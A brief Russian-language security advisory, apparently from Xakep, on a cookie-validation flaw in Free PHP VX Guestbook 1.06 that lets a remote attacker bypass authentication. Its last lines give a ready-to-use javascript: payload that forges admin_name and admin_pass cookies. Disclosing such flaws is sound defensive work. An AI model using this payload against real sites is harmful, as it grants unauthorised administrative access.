Рекомендуем почитать:
Хакер #305. Многошаговые SQL-инъекции
Программа: Free PHP VX Guestbook 1.06
Уязвимость позволяет удаленному злоумышленнику обойти ограничения
безопасности на целевой системе. Уязвимость существует из-за ошибки в проверке
входных данных при обработке cookie. Эксплуатирование уязвимости приведет к
обходу механизма аутентификации на целевой системе.
Эксплоит:
javascript:document.cookie = "admin_name=1; path=/"; document.cookie = "admin_pass=1;
path=/";